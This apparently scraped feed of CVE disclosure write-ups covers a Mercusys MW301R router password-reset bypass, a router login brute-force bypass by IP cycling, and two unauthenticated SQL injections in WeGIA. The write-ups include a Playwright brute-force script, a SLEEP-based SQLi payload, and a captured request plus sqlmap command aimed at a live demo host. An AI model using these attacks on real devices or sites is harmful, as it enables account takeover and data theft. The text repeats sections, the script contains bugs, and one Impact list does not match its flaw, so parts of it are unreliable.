https://www.cvehunters.com/p/cve-2025-7881/ https://www.cvehunters.com/p/cve-2025-7881/ <h2 id="cve-2025-7881-authentication-bypass-in-reset-password">CVE-2025-7881: Authentication Bypass in reset password </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7881" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7881</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">In authenticated sessions, it is possible to completely bypass the password‑change workflow without knowing the current admin password. On the Mercusys MW301R, the official recovery method for a forgotten password is to perform a factory reset—which requires physical access—or, within a valid session, to supply the existing password. The discovered bypass allows an attacker who is already authenticated to intercept the HTTP request and simply modify the code parameter to invoke the reset endpoint directly. This enables the administrator password to be changed remotely, without any physical interaction with the device or knowledge of the previous credential.</p><h2 id="cve-2025-7881-authentication-bypass-in-reset-password">CVE-2025-7881: Authentication Bypass in reset password </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7881" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7881</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">In authenticated sessions, it is possible to completely bypass the password‑change workflow without knowing the current admin password. On the Mercusys MW301R, the official recovery method for a forgotten password is to perform a factory reset—which requires physical access—or, within a valid session, to supply the existing password. The discovered bypass allows an attacker who is already authenticated to intercept the HTTP request and simply modify the code parameter to invoke the reset endpoint directly. This enables the administrator password to be changed remotely, without any physical interaction with the device or knowledge of the previous credential.</p> <h2 id="details">Details </h2><p style="text-align: justify;"> <ol> <li> Access the router's web interface by navigating to <code>http://192.168.1.1/</code> and logging in with the administrator password. <br /><strong>Note:</strong> If the password is forgotten, the only recovery method is a factory reset using the physical Reset button (hold it until all LEDs light up). </li> <li> While logged in, perform any action that triggers a POST request with <code>code=</code> and <code>id=</code> parameters (e.g., keepalive or status check), and intercept it using a proxy to capture a valid session ID. </li> <li> Modify the intercepted request by changing <code>code=</code> to <code>code=5</code>, then forward the altered request to the router. </li> <li> Refresh the page at <code>http://192.168.1.1/</code> in your browser. </li> <li> The interface will now prompt for a new password without asking for the current one. Set and confirm your new password to reset it remotely. </li> </ol> </p> <h2 id="poc">PoC </h2><p><img src="/p/cve-2025-7881/image.png" width="1761" height="914" srcset="/p/cve-2025-7881/image_hu_84851d9b3281fdd2.png 480w, /p/cve-2025-7881/image_hu_712ec8092b9c202e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="192" data-flex-basis="462px" /></p> <p><img src="/p/cve-2025-7881/image-1.png" width="1896" height="950" srcset="/p/cve-2025-7881/image-1_hu_ffbdf451785a2336.png 480w, /p/cve-2025-7881/image-1_hu_b3e5565b00c0449f.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="199" data-flex-basis="478px" /></p> <p><img src="/p/cve-2025-7881/image-2.png" width="1743" height="990" srcset="/p/cve-2025-7881/image-2_hu_b00c8f44d15ccd57.png 480w, /p/cve-2025-7881/image-2_hu_9492fbe60421903a.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="176" data-flex-basis="422px" /></p> <p><img src="/p/cve-2025-7881/image-3.png" width="1897" height="948" srcset="/p/cve-2025-7881/image-3_hu_582f72308fd6f70c.png 480w, /p/cve-2025-7881/image-3_hu_bf92a9c54baec3b4.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="200" data-flex-basis="480px" /></p> <h3 id="video-poc">Video PoC </h3><p><a class="link" href="https://youtu.be/-mlmTZ-3PzM" target="_blank" rel="noopener" >https://youtu.be/-mlmTZ-3PzM</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">The lack of session validation in this endpoint can lead to several security risks:</p> <p style="text-align: justify;"> <ul> <li><b>Unauthorized Data Exposure:</b> Unauthenticated users can enumerate or retrieve sensitive internal data.</li> <li><b>Privilege Escalation:</b> Attackers might access or infer information intended only for authorized users.</li> <li><b>Information Disclosure:</b> Business logic and internal IDs (like user roles or permissions) can be leaked.</li> <li><b>Reconnaissance Support:</b> Facilitates attackers in mapping backend structures for more targeted attacks.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7881.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7881.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-7882/ https://www.cvehunters.com/p/cve-2025-7882/ <h2 id="cve-2025-7882-brute-force-bypass-via-ip-cycling">CVE-2025-7882: Brute Force Bypass via IP Cycling </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7882" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7882</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">The Mercusys MW301R router implements a basic brute-force protection mechanism that blocks login attempts after a number of failed tries. However, this blocking mechanism is based solely on the source IP address, without enforcing any session fingerprinting, token validation, or advanced rate-limiting / and MAC Address, etc.</p> <h2 id="details">Details </h2><p style="text-align: justify;"></p>An attacker connected to the LAN can simply change their local IP address (e.g., from 192.168.1.10 to 192.168.1.11) after reaching the limit, effectively resetting the login attempt counter. </br> This allows a brute-force attack to be performed against the admin login page, completely defeating the intended security mechanism. <p style="text-align: justify;"> <ol> <li> Connect to the same local network as the router (default gateway: <code>192.168.1.1</code>) to prepare the attack environment. </li> <li> Start brute-force login attempts by sending requests with different password values. After a few failures, the router will block further attempts from that IP address. </li> <li> To bypass the block, change your device’s IP address to another one within the allowed range, then continue the brute-force process from the new IP. </li> <li> Repeat this process—each time your IP is blocked, switch to another IP between <code>192.168.1.4</code> and <code>192.168.1.254</code> and resume the attack. </li> </ol> </p><h2 id="cve-2025-7882-brute-force-bypass-via-ip-cycling">CVE-2025-7882: Brute Force Bypass via IP Cycling </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-7882" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-7882</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">The Mercusys MW301R router implements a basic brute-force protection mechanism that blocks login attempts after a number of failed tries. However, this blocking mechanism is based solely on the source IP address, without enforcing any session fingerprinting, token validation, or advanced rate-limiting / and MAC Address, etc.</p> <h2 id="details">Details </h2><p style="text-align: justify;"></p>An attacker connected to the LAN can simply change their local IP address (e.g., from 192.168.1.10 to 192.168.1.11) after reaching the limit, effectively resetting the login attempt counter. </br> This allows a brute-force attack to be performed against the admin login page, completely defeating the intended security mechanism. <p style="text-align: justify;"> <ol> <li> Connect to the same local network as the router (default gateway: <code>192.168.1.1</code>) to prepare the attack environment. </li> <li> Start brute-force login attempts by sending requests with different password values. After a few failures, the router will block further attempts from that IP address. </li> <li> To bypass the block, change your device’s IP address to another one within the allowed range, then continue the brute-force process from the new IP. </li> <li> Repeat this process—each time your IP is blocked, switch to another IP between <code>192.168.1.4</code> and <code>192.168.1.254</code> and resume the attack. </li> </ol> </p> <h2 id="exploit-code">Exploit Code: </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-python" data-lang="python"><span class="line"><span class="cl"><span class="kn">import</span> <span class="nn">time</span> <span class="kn">from</span> <span class="nn">playwright.sync_api</span> <span class="kn">import</span> <span class="n">Playwright</span><span class="p">,</span> <span class="n">sync_playwright</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">carrega_senhas</span><span class="p">(</span><span class="n">caminho_arquivo</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-></span> <span class="nb">list</span><span class="p">[</span><span class="nb">str</span><span class="p">]:</span> <span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">caminho_arquivo</span><span class="p">,</span> <span class="s2">"r"</span><span class="p">,</span> <span class="n">encoding</span><span class="o">=</span><span class="s2">"utf-8"</span><span class="p">)</span> <span class="k">as</span> <span class="n">f</span><span class="p">:</span> <span class="k">return</span> <span class="p">[</span><span class="n">linha</span><span class="o">.</span><span class="n">strip</span><span class="p">()</span> <span class="k">for</span> <span class="n">linha</span> <span class="ow">in</span> <span class="n">f</span> <span class="k">if</span> <span class="n">linha</span><span class="o">.</span><span class="n">strip</span><span class="p">()]</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">tenta_login</span><span class="p">(</span><span class="n">page</span><span class="p">,</span> <span class="n">senha</span><span class="p">:</span> <span class="nb">str</span><span class="p">)</span> <span class="o">-></span> <span class="nb">bool</span><span class="p">:</span> <span class="n">page</span><span class="o">.</span><span class="n">goto</span><span class="p">(</span><span class="s2">"http://192.168.1.1/"</span><span class="p">)</span> <span class="n">page</span><span class="o">.</span><span class="n">get_by_role</span><span class="p">(</span><span class="s2">"textbox"</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s2">"Senha de Login"</span><span class="p">)</span><span class="o">.</span><span class="n">fill</span><span class="p">(</span><span class="n">senha</span><span class="p">)</span> <span class="n">page</span><span class="o">.</span><span class="n">get_by_role</span><span class="p">(</span><span class="s2">"textbox"</span><span class="p">,</span> <span class="n">name</span><span class="o">=</span><span class="s2">"Senha de Login"</span><span class="p">)</span><span class="o">.</span><span class="n">press</span><span class="p">(</span><span class="s2">"Enter"</span><span class="p">)</span> <span class="n">time</span><span class="o">.</span><span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="k">try</span><span class="p">:</span> <span class="n">page</span><span class="o">.</span><span class="n">get_by_text</span><span class="p">(</span><span class="s2">"Avançado"</span><span class="p">,</span> <span class="n">exact</span><span class="o">=</span><span class="kc">True</span><span class="p">,</span> <span class="n">timeout</span><span class="o">=</span><span class="mi">2000</span><span class="p">)</span> <span class="k">return</span> <span class="kc">True</span> <span class="k">except</span><span class="p">:</span> <span class="k">return</span> <span class="kc">False</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">def</span> <span class="nf">run</span><span class="p">(</span><span class="n">playwright</span><span class="p">:</span> <span class="n">Playwright</span><span class="p">)</span> <span class="o">-></span> <span class="kc">None</span><span class="p">:</span> <span class="n">browser</span> <span class="o">=</span> <span class="n">playwright</span><span class="o">.</span><span class="n">chromium</span><span class="o">.</span><span class="n">launch</span><span class="p">(</span><span class="n">headless</span><span class="o">=</span><span class="kc">False</span><span class="p">)</span> <span class="n">context</span> <span class="o">=</span> <span class="n">browser</span><span class="o">.</span><span class="n">new_context</span><span class="p">()</span> <span class="n">page</span> <span class="o">=</span> <span class="n">context</span><span class="o">.</span><span class="n">new_page</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">senhas</span> <span class="o">=</span> <span class="n">carrega_senhas</span><span class="p">(</span><span class="s2">"senhas.txt"</span><span class="p">,</span> <span class="s2">""</span><span class="p">)</span> </span></span><span class="line"><span class="cl"><span class="k">for</span> <span class="n">idx</span><span class="p">,</span> <span class="n">senha</span> <span class="ow">in</span> <span class="nb">enumerate</span><span class="p">(</span><span class="n">senhas</span><span class="p">,</span> <span class="mi">1</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">"[</span><span class="si">{</span><span class="n">idx</span><span class="si">}</span><span class="s2">/</span><span class="si">{</span><span class="nb">len</span><span class="p">(</span><span class="n">senhas</span><span class="p">)</span><span class="si">}</span><span class="s2">] Testando senha: </span><span class="si">{</span><span class="n">senha</span><span class="si">!r}</span><span class="s2">"</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> <span class="k">if</span> <span class="n">tenta_login</span><span class="p">(</span><span class="n">page</span><span class="p">,</span> <span class="n">senha</span><span class="p">):</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="sa">f</span><span class="s2">">>> Sucesso! Senha encontrada: </span><span class="si">{</span><span class="n">senha</span><span class="si">!r}</span><span class="s2">"</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> <span class="n">page</span><span class="o">.</span><span class="n">get_by_text</span><span class="p">(</span><span class="s2">"Avançado"</span><span class="p">,</span> <span class="n">exact</span><span class="o">=</span><span class="kc">True</span><span class="p">)</span><span class="o">.</span><span class="n">click</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> <span class="k">break</span> </span></span><span class="line"><span class="cl"><span class="k">else</span><span class="p">:</span> </span></span><span class="line"><span class="cl"> <span class="nb">print</span><span class="p">(</span><span class="s2">"Nenhuma senha funcionou."</span><span class="p">)</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="n">context</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"><span class="n">browser</span><span class="o">.</span><span class="n">close</span><span class="p">()</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"><span class="k">if</span> <span class="n">name</span> <span class="o">==</span> <span class="s2">"main"</span><span class="p">:</span> <span class="k">with</span> <span class="n">sync_playwright</span><span class="p">()</span> <span class="k">as</span> <span class="n">playwright</span><span class="p">:</span> <span class="n">run</span><span class="p">(</span><span class="n">playwright</span><span class="p">)</span> <span class="n">r</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="poc">PoC </h2><p><img src="/p/cve-2025-7882/image.png" width="1878" height="950" srcset="/p/cve-2025-7882/image_hu_91b4360fd68a28ba.png 480w, /p/cve-2025-7882/image_hu_d141f112b09e10d2.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="197" data-flex-basis="474px" /></p> <p><img src="/p/cve-2025-7882/image-1.png" width="1889" height="1016" srcset="/p/cve-2025-7882/image-1_hu_2f38919172f7d0b7.png 480w, /p/cve-2025-7882/image-1_hu_268f297aff1b93f7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="185" data-flex-basis="446px" /></p> <p><img src="/p/cve-2025-7882/image-2.png" width="489" height="534" srcset="/p/cve-2025-7882/image-2_hu_e9f740f724ca4e72.png 480w, /p/cve-2025-7882/image-2_hu_44ca76c3433fa5cf.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="91" data-flex-basis="219px" /></p> <p><img src="/p/cve-2025-7882/image-3.png" width="442" height="542" srcset="/p/cve-2025-7882/image-3_hu_b2613553a6c02900.png 480w, /p/cve-2025-7882/image-3_hu_9d0794b8a52b243e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="81" data-flex-basis="195px" /></p> <p><img src="/p/cve-2025-7882/image-4.png" width="1830" height="933" srcset="/p/cve-2025-7882/image-4_hu_89b33ba6038c9b72.png 480w, /p/cve-2025-7882/image-4_hu_9581ddd2580c03c9.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="196" data-flex-basis="470px" /></p> <h3 id="video-poc">Video PoC </h3><p><a class="link" href="https://youtu.be/_t3ZC8zU4-A" target="_blank" rel="noopener" >https://youtu.be/_t3ZC8zU4-A</a></p> <h2 id="impact">Impact </h2><p style="text-align: justify;">The lack of session validation in this endpoint can lead to several security risks:</p> <p style="text-align: justify;"> <ul> <li><b>Unauthorized Data Exposure:</b> Unauthenticated users can enumerate or retrieve sensitive internal data.</li> <li><b>Privilege Escalation:</b> Attackers might access or infer information intended only for authorized users.</li> <li><b>Information Disclosure:</b> Business logic and internal IDs (like user roles or permissions) can be leaked.</li> <li><b>Reconnaissance Support:</b> Facilitates attackers in mapping backend structures for more targeted attacks.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7882.md" target="_blank" rel="noopener" >https://github.com/RaulPazemecxas/PoCVulDb/blob/main/CVE-2025-7882.md</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/raul50x50.png" loading="lazy" /></a> <a class="link" href="https://github.com/%20%20www.linkedin.com/in/raul-pazem%C3%A9cxas-04882b21a/" target="_blank" rel="noopener" >Raul Pazemécxas</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/CVE-Hunters/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Sun, 20 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-53946/ https://www.cvehunters.com/p/cve-2025-53946/ <h2 id="cve-2025-53946-sql-injection-vulnerability-in-id_fichamedica-parameter-on-profile_pacientephp-endpoint">CVE-2025-53946: SQL Injection Vulnerability in <code>id_fichamedica</code> Parameter on <code>profile_paciente.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53946" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53946</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_fichamedica</code> parameter of the <code>/html/saude/profile_paciente.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id_fichamedica</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-53946-sql-injection-vulnerability-in-id_fichamedica-parameter-on-profile_pacientephp-endpoint">CVE-2025-53946: SQL Injection Vulnerability in <code>id_fichamedica</code> Parameter on <code>profile_paciente.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-53946" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-53946</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>id_fichamedica</code> parameter of the <code>/html/saude/profile_paciente.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>id_fichamedica</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/html/saude/profile_paciente.php</code></p> <p>Parameter: <code>id_fichamedica</code></p> <h3 id="payload">Payload: </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> 1+AND+SLEEP(10) </span></span></code></pre></td></tr></table> </div> </div><h3 id="manual-exploration">Manual Exploration: </h3><p><img src="/p/cve-2025-53946/image.png" width="1280" height="602" srcset="/p/cve-2025-53946/image_hu_446a5f0aca967603.png 480w, /p/cve-2025-53946/image_hu_88f973a4b4b6d596.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="212" data-flex-basis="510px" /></p> <p><img src="/p/cve-2025-53946/image-1.png" width="1280" height="588" srcset="/p/cve-2025-53946/image-1_hu_10a28eb522607c.png 480w, /p/cve-2025-53946/image-1_hu_2b701927703256a7.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="217" data-flex-basis="522px" /></p> <h3 id="sqlmap">Sqlmap: </h3><p><img src="/p/cve-2025-53946/image-2.png" width="859" height="660" srcset="/p/cve-2025-53946/image-2_hu_d8d1038b65332cf7.png 480w, /p/cve-2025-53946/image-2_hu_144f09ecde05299.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="130" data-flex-basis="312px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-532r-mgxv-g7jm" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-532r-mgxv-g7jm</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" >CVE-Hunters</a></em></p> </blockquote> Thu, 17 Jul 2025 00:00:00 +0000 https://www.cvehunters.com/p/cve-2025-54058/ https://www.cvehunters.com/p/cve-2025-54058/ <h2 id="cve-2025-54058-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editarenderecophp-endpoint">CVE-2025-54058: SQL Injection (Blind Time-Based) Vulnerability in <code>idatendido_familiares</code> Parameter on <code>dependente_editarEndereco.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54058" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54058</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>idatendido_familiares</code> parameter of the <code>/html/funcionario/dependente_editarEndereco.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>idatendido_familiares</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p><h2 id="cve-2025-54058-sql-injection-blind-time-based-vulnerability-in-idatendido_familiares-parameter-on-dependente_editarenderecophp-endpoint">CVE-2025-54058: SQL Injection (Blind Time-Based) Vulnerability in <code>idatendido_familiares</code> Parameter on <code>dependente_editarEndereco.php</code> Endpoint </h2><blockquote> <p><em>CVE Publication: <a class="link" href="https://www.cve.org/CVERecord?id=CVE-2025-54058" target="_blank" rel="noopener" >https://www.cve.org/CVERecord?id=CVE-2025-54058</a></em></p> </blockquote> <h2 id="summary">Summary </h2><p style="text-align: justify;">A SQL Injection vulnerability was discovered in the <code>idatendido_familiares</code> parameter of the <code>/html/funcionario/dependente_editarEndereco.php</code> endpoint. This issue allows any unauthenticated attacker to inject arbitrary SQL queries, potentially leading to unauthorized data access or further exploitation depending on database configuration.</p> <h2 id="details">Details </h2><p style="text-align: justify;">The application fails to properly sanitize user-supplied input in the <code>idatendido_familiares</code> parameter. As a result, specially crafted SQL payloads are interpreted directly by the backend database.</p> <h2 id="poc">PoC </h2><p>Vulnerable Endpoint: <code>/html/funcionario/dependente_editarEndereco.php</code></p> <p>Parameter: <code>idatendido_familiares</code></p> <p style="text-align: justify;">Save the request in <code>req.txt</code> file:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> POST /html/funcionario/dependente_editarEndereco.php?id_pessoa=3&idatendido_familiares=1 HTTP/1.1 </span></span><span class="line"><span class="cl"> Host: demo.wegia.org </span></span><span class="line"><span class="cl"> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 </span></span><span class="line"><span class="cl"> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 </span></span><span class="line"><span class="cl"> Accept-Language: en-US,en;q=0.5 </span></span><span class="line"><span class="cl"> Accept-Encoding: gzip, deflate, br, zstd </span></span><span class="line"><span class="cl"> Content-Type: application/x-www-form-urlencoded </span></span><span class="line"><span class="cl"> Content-Length: 125 </span></span><span class="line"><span class="cl"> Origin: https://demo.wegia.org </span></span><span class="line"><span class="cl"> Connection: keep-alive </span></span><span class="line"><span class="cl"> Referer: https://demo.wegia.org/html/funcionario/profile_dependente.php?id_dependente=1 </span></span><span class="line"><span class="cl"> Cookie: _ga_F8DXBXLV8J=GS2.1.s1751259204$o23$g1$t1751262251$j60$l0$h0; _ga=GA1.1.424189364.1749063834; PHPSESSID=ogoa4lr4nrqqudih73o8oj76p1 </span></span><span class="line"><span class="cl"> Upgrade-Insecure-Requests: 1 </span></span><span class="line"><span class="cl"> Sec-Fetch-Dest: document </span></span><span class="line"><span class="cl"> Sec-Fetch-Mode: navigate </span></span><span class="line"><span class="cl"> Sec-Fetch-Site: same-origin </span></span><span class="line"><span class="cl"> Sec-Fetch-User: ?1 </span></span><span class="line"><span class="cl"> Priority: u=0, i </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl"> cep=52011-040&uf=PE&cidade=Recife&bairro=Gra%C3%A7as&rua=Avenida+Rui+Barbosa&numero_residencia=12&complemento=12&ibge=2611606 </span></span></code></pre></td></tr></table> </div> </div><p style="text-align: justify;">Then, use <code>sqlmap</code>:</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl"> sqlmap -r req.txt -p idatendido_familiares --risk=3 --level=5 --dbs --batch --dbms=mysql --batch </span></span></code></pre></td></tr></table> </div> </div><p><img src="/p/cve-2025-54058/image.png" width="864" height="755" srcset="/p/cve-2025-54058/image_hu_464b5ea2f7936886.png 480w, /p/cve-2025-54058/image_hu_4782a5da1e37635e.png 1024w" loading="lazy" class="gallery-image" data-flex-grow="114" data-flex-basis="274px" /></p> <h2 id="impact">Impact </h2><p style="text-align: justify;"> <ul> <li>Unauthorized access to sensitive data (e.g., users, passwords, logs).</li> <li>Database enumeration (schemas, tables, users, versions).</li> <li>Escalation to RCE depending on DB configuration (e.g., xp_cmdshell, UDFs).</li> <li>Full compromise of the application if chained with other vulnerabilities.</li> <li>This issue affects all users and environments, as it does not require authentication and is reachable via a public endpoint.</li> </ul> </p> <h2 id="reference">Reference </h2><p><a class="link" href="https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5pwp-39jc-wxj8" target="_blank" rel="noopener" >https://github.com/LabRedesCefetRJ/WeGIA/security/advisories/GHSA-5pwp-39jc-wxj8</a></p> <h2 id="finder">Finder </h2><p><a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/marcelo50x50.png" loading="lazy" /></a> <a class="link" href="http://www.linkedin.com/in/marceloqueirozjr" target="_blank" rel="noopener" >Marcelo Queiroz</a></p> <h2 id="contributor">Contributor </h2><p><a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" ><img src="/assets/contributors/50x50/natan50x50.png" loading="lazy" /></a> <a class="link" href="https://www.linkedin.com/in/nmmorette/" target="_blank" rel="noopener" >Natan Maia Morette</a></p> <blockquote> <p><em>By: <a class="link" href="https://github.com/Sec-Dojo-Cyber-House/cve-hunters" target="_blank" rel="noopener" 